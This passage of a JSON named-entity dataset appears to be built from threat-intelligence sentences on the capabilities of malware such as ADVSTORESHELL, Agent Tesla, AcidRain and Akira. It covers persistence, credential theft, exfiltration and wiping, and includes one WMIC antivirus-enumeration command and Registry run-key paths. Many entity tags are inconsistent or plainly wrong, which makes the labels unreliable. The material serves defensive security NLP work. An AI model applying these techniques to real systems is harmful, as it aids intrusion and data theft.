"O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "steal", "users’", "access", "tokens", "via", "phishing", "emails", "containing", "malicious", "links." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "create", "and", "export", "various", "authentication", "certificates,", "including", "those", "associated", "with", "Azure", "AD", "joined/registered", "devices." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AADInternals", "can", "create", "a", "backdoor", "by", "converting", "a", "domain", "to", "a", "federated", "domain", "which", "will", "be", "able", "to", "authenticate", "any", "user", "across", "the", "tenant.", "AADInternals", "can", "also", "modify", "DesktopSSO", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "ABK", "has", "the", "ability", "to", "decrypt", "AES", "encrypted", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Tool", "O", "O" ] }, { "tokens": [ "ABK", "has", "the", "ability", "to", "download", "files", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "ABK", "has", "the", "ability", "to", "inject", "shellcode", "into", "svchost.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "B-Way" ] }, { "tokens": [ "ABK", "has", "the", "ability", "to", "identify", "the", "installed", "anti-virus", "product", "on", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ABK", "can", "extract", "a", "malicious", "Portable", "Executable", "(PE)", "from", "a", "photo." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ABK", "has", "the", "ability", "to", "use", "HTTP", "in", "communications", "with", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ABK", "has", "the", "ability", "to", "use", "cmd", "to", "run", "a", "Portable", "Executable", "(PE)", "on", "the", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "encrypts", "with", "the", "3DES", "algorithm", "and", "a", "hardcoded", "key", "prior", "to", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "compresses", "output", "data", "generated", "by", "command", "execution", "with", "a", "custom", "implementation", "of", "the", "Lempel–Ziv–Welch", "(LZW)", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "A", "variant", "of", "ADVSTORESHELL", "encrypts", "some", "C2", "with", "RSA." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Some", "variants", "of", "ADVSTORESHELL", "achieve", "persistence", "by", "registering", "the", "payload", "as", "a", "Shell", "Icon", "Overlay", "handler", "COM", "object." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Features", "O", "O", "O", "O", "B-Tool", "B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "exfiltrates", "data", "over", "the", "same", "channel", "used", "for", "C2." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "can", "delete", "files", "and", "directories." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "B-HackOrg" ] }, { "tokens": [ "ADVSTORESHELL", "can", "list", "files", "and", "directories." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ADVSTORESHELL", "can", "perform", "keylogging." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "stores", "output", "from", "command", "execution", "in", "a", ".dat", "file", "in", "the", "%TEMP%", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "is", "capable", "of", "setting", "and", "deleting", "Registry", "values." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "O", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "ADVSTORESHELL", "is", "capable", "of", "starting", "a", "process", "using", "CreateProcess." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Most", "of", "the", "strings", "in", "ADVSTORESHELL", "are", "encrypted", "with", "an", "XOR-based", "algorithm;", "some", "strings", "are", "also", "encrypted", "with", "3DES", "and", "reversed.", "API", "function", "names", "are", "also", "reversed,", "presumably", "to", "avoid", "detection", "in", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "can", "list", "connected", "devices." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "can", "list", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ADVSTORESHELL", "can", "enumerate", "registry", "keys." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "ADVSTORESHELL", "achieves", "persistence", "by", "adding", "itself", "to", "the", "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "Registry", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "has", "used", "rundll32.exe", "in", "a", "Registry", "value", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "collects,", "compresses,", "encrypts,", "and", "exfiltrates", "data", "to", "the", "C2", "server", "every", "10", "minutes." ], "ner_tags": [ "B-SamFile", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "C2", "traffic", "from", "ADVSTORESHELL", "is", "encrypted,", "then", "encoded", "with", "Base64", "encoding." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "variant", "of", "ADVSTORESHELL", "encrypts", "some", "C2", "with", "3DES." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ADVSTORESHELL", "can", "run", "Systeminfo", "to", "gather", "information", "about", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "ADVSTORESHELL", "connects", "to", "port", "80", "of", "a", "C2", "server", "using", "Wininet", "API.", "Data", "is", "exchanged", "via", "HTTP", "POSTs." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ADVSTORESHELL", "can", "create", "a", "remote", "shell", "and", "run", "a", "given", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ANDROMEDA", "can", "download", "additional", "payloads", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O" ] }, { "tokens": [ "ANDROMEDA", "has", "been", "delivered", "through", "a", "LNK", "file", "disguised", "as", "a", "folder." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ANDROMEDA", "has", "been", "installed", "to", "`C:\\Temp\\TrustedInstaller.exe`", "to", "mimic", "a", "legitimate", "Windows", "installer", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ANDROMEDA", "can", "inject", "into", "the", "`wuauclt.exe`", "process", "to", "perform", "C2", "actions." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ANDROMEDA", "can", "establish", "persistence", "by", "dropping", "a", "sample", "of", "itself", "to", "`C:\\ProgramData\\Local", "Settings\\Temp\\mskmde.com`", "and", "adding", "a", "Registry", "run", "key", "to", "execute", "every", "time", "a", "user", "logs", "on." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ANDROMEDA", "has", "been", "spread", "via", "infected", "USB", "keys." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "ANDROMEDA", "has", "the", "ability", "to", "make", "GET", "requests", "to", "download", "files", "from", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "ASPXSpy", "is", "a", "Web", "shell.", "The", "ASPXTool", "version", "used", "by", "Threat", "Group-3390", "has", "been", "deployed", "to", "accessible", "servers", "running", "Internet", "Information", "Services", "(IIS)." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AcidRain", "performs", "an", "in-depth", "wipe", "of", "the", "target", "filesystem", "and", "various", "attached", "storage", "devices", "through", "either", "a", "data", "overwrite", "or", "calling", "various", "IOCTLS", "to", "erase", "it." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "AcidRain", "iterates", "over", "device", "file", "identifiers", "on", "the", "target,", "opens", "the", "device", "file,", "and", "either", "overwrites", "the", "file", "or", "calls", "various", "IOCTLS", "commands", "to", "erase", "it." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "AcidRain", "identifies", "specific", "files", "and", "directories", "in", "the", "Linux", "operating", "system", "associated", "with", "storage", "devices." ], "ner_tags": [ "B-Time", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AcidRain", "reboots", "the", "target", "system", "once", "the", "various", "wiping", "processes", "are", "complete." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "can", "collect", "local", "data", "from", "an", "infected", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "can", "use", "Base64", "to", "decode", "actor-controlled", "C2", "server", "communications." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "has", "the", "ability", "to", "collect", "drive", "and", "file", "information", "on", "an", "infected", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "has", "the", "ability", "to", "download", "additional", "payloads", "onto", "an", "infected", "machine." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT's", "commands,", "strings,", "and", "domains", "can", "be", "Base64", "encoded", "within", "the", "payload." ], "ner_tags": [ "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "can", "identify", "AV", "products", "on", "an", "infected", "host", "using", "the", "following", "command:", "`cmd.exe", "WMIC", "/Node:localhost", "/Namespace:\\\\root\\SecurityCenter2", "Path", "AntiVirusProduct", "Get", "displayName", "/Format:List`." ], "ner_tags": [ "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "has", "the", "ability", "to", "collect", "the", "hostname,", "OS", "version,", "and", "OS", "architecture", "of", "an", "infected", "host." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "has", "the", "ability", "to", "collect", "the", "MAC", "address", "of", "an", "infected", "host." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "has", "the", "ability", "to", "collect", "the", "username", "from", "an", "infected", "host." ], "ner_tags": [ "I-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "can", "use", "HTTP", "to", "communicate", "with", "C2", "servers." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "can", "use", "`cmd.exe`", "to", "execute", "commands", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Action", "RAT", "can", "use", "WMI", "to", "gather", "AV", "products", "installed", "on", "an", "infected", "host." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "O", "I-Purp", "B-HackOrg", "B-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AdFind", "can", "enumerate", "domain", "users." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "AdFind", "can", "enumerate", "domain", "groups." ], "ner_tags": [ "B-Way", "O", "B-Features", "I-Features", "O" ] }, { "tokens": [ "AdFind", "can", "gather", "information", "about", "organizational", "units", "(OUs)", "and", "domain", "trusts", "from", "Active", "Directory." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AdFind", "has", "the", "ability", "to", "query", "Active", "Directory", "for", "computers." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "AdFind", "can", "extract", "subnet", "information", "from", "Active", "Directory." ], "ner_tags": [ "B-Way", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "encrypt", "data", "with", "3DES", "before", "sending", "it", "over", "to", "a", "C2", "server." ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "the", "ability", "to", "use", "form-grabbing", "to", "extract", "data", "from", "web", "data", "forms." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "steal", "data", "from", "the", "victim’s", "clipboard." ], "ner_tags": [ "O", "B-Idus", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "the", "ability", "to", "extract", "credentials", "from", "configuration", "or", "support", "files." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "the", "ability", "to", "steal", "credentials", "from", "FTP", "clients", "and", "wireless", "profiles." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "gather", "credentials", "from", "a", "number", "of", "browsers." ], "ner_tags": [ "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "the", "ability", "to", "extract", "credentials", "from", "the", "Registry." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "the", "ability", "to", "decrypt", "strings", "encrypted", "with", "the", "Rijndael", "symmetric", "encryption", "algorithm." ], "ner_tags": [ "O", "B-SecTeam", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "the", "capability", "to", "kill", "any", "running", "analysis", "processes", "and", "AV", "software." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "routines", "for", "exfiltration", "over", "SMTP,", "FTP,", "and", "HTTP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Agent", "Tesla", "has", "exploited", "Office", "vulnerabilities", "such", "as", "CVE-2017-11882", "and", "CVE-2017-8570", "for", "execution", "during", "delivery." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "created", "hidden", "folders." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "used", "<code>ProcessWindowStyle.Hidden</code>", "to", "hide", "windows." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "download", "additional", "files", "for", "execution", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "log", "keystrokes", "on", "the", "victim’s", "machine." ], "ner_tags": [ "O", "B-HackOrg", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "collect", "account", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "used", "SMTP", "for", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "been", "executed", "through", "malicious", "e-mail", "attachments" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "achieve", "persistence", "by", "modifying", "Registry", "key", "entries." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-HackOrg", "B-Way", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "had", "its", "code", "obfuscated", "in", "an", "apparent", "attempt", "to", "make", "analysis", "difficult.", "Agent", "Tesla", "has", "used", "the", "Rijndael", "symmetric", "encryption", "algorithm", "to", "encrypt", "strings." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SecTeam", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "list", "the", "current", "running", "processes", "on", "the", "system." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "used", "process", "hollowing", "to", "create", "and", "manipulate", "processes", "through", "sections", "of", "unmapped", "memory", "by", "reallocating", "that", "space", "with", "its", "malicious", "code." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "inject", "into", "known,", "vulnerable", "binaries", "on", "targeted", "hosts." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "add", "itself", "to", "the", "Registry", "as", "a", "startup", "program", "to", "establish", "persistence." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "dropped", "RegAsm.exe", "onto", "systems", "for", "performing", "malicious", "activity." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "Agent", "Tesla", "has", "achieved", "persistence", "via", "scheduled", "tasks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "capture", "screenshots", "of", "the", "victim’s", "desktop." ], "ner_tags": [ "O", "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "The", "primary", "delivered", "mechanism", "for", "Agent", "Tesla", "is", "through", "email", "phishing", "messages." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "B-Way", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "collect", "the", "system's", "computer", "name", "and", "also", "has", "the", "capability", "to", "collect", "information", "on", "the", "processor,", "memory,", "OS,", "and", "video", "card", "from", "the", "system." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "collect", "the", "IP", "address", "of", "the", "victim", "machine", "and", "spawn", "instances", "of", "netsh.exe", "to", "enumerate", "wireless", "settings." ], "ner_tags": [ "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "collect", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "collect", "the", "timestamp", "from", "the", "victim’s", "machine." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "access", "the", "victim’s", "webcam", "and", "record", "video." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "the", "ability", "to", "perform", "anti-sandboxing", "and", "anti-virtualization", "checks." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "can", "collect", "names", "and", "passwords", "of", "all", "Wi-Fi", "networks", "to", "which", "a", "device", "has", "previously", "connected." ], "ner_tags": [ "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent", "Tesla", "has", "used", "wmi", "queries", "to", "gather", "information", "from", "the", "system." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "Agent.btz", "saves", "system", "information", "into", "an", "XML", "file", "that", "is", "then", "XOR-encoded." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent.btz", "creates", "a", "file", "named", "thumb.dd", "on", "all", "USB", "flash", "drives", "connected", "to", "the", "victim.", "This", "file", "contains", "information", "about", "the", "infected", "system", "and", "activity", "logs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent.btz", "attempts", "to", "download", "an", "encrypted", "binary", "from", "a", "specified", "domain." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent.btz", "drops", "itself", "onto", "removable", "media", "devices", "and", "creates", "an", "autorun.inf", "file", "with", "an", "instruction", "to", "run", "that", "file.", "When", "the", "device", "is", "inserted", "into", "another", "system,", "it", "opens", "autorun.inf", "and", "loads", "the", "malware." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Agent.btz", "collects", "the", "network", "adapter’s", "IP", "and", "MAC", "address", "as", "well", "as", "IP", "addresses", "of", "the", "network", "adapter’s", "default", "gateway,", "primary/secondary", "WINS,", "DHCP,", "and", "DNS", "servers,", "and", "saves", "them", "into", "a", "log", "file." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Agent.btz", "obtains", "the", "victim", "username", "and", "saves", "it", "to", "a", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "encrypts", "victim", "filesystems", "for", "financial", "extortion", "purposes." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Akira", "examines", "files", "prior", "to", "encryption", "to", "determine", "if", "they", "meet", "requirements", "for", "encryption", "and", "can", "be", "encrypted", "by", "the", "ransomware.", "These", "checks", "are", "performed", "through", "native", "Windows", "functions", "such", "as", "<code>GetFileAttributesW</code>." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "will", "delete", "system", "volume", "shadow", "copies", "via", "PowerShell", "commands." ], "ner_tags": [ "B-HackOrg", "O", "B-Features", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Akira", "executes", "native", "Windows", "functions", "such", "as", "<code>GetFileAttributesW</code>", "and", "`GetSystemInfo`." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "can", "identify", "remote", "file", "shares", "for", "encryption." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "will", "execute", "PowerShell", "commands", "to", "delete", "system", "volume", "shadow", "copies." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "verifies", "the", "deletion", "of", "volume", "shadow", "copies", "by", "checking", "for", "the", "existence", "of", "the", "process", "ID", "related", "to", "the", "process", "created", "to", "delete", "these", "items." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "uses", "the", "<code>GetSystemInfo</code>", "Windows", "function", "to", "determine", "the", "number", "of", "processors", "on", "a", "victim", "machine." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Akira", "executes", "from", "the", "Windows", "command", "line", "and", "can", "take", "various", "arguments", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "Akira", "will", "leverage", "COM", "objects", "accessed", "through", 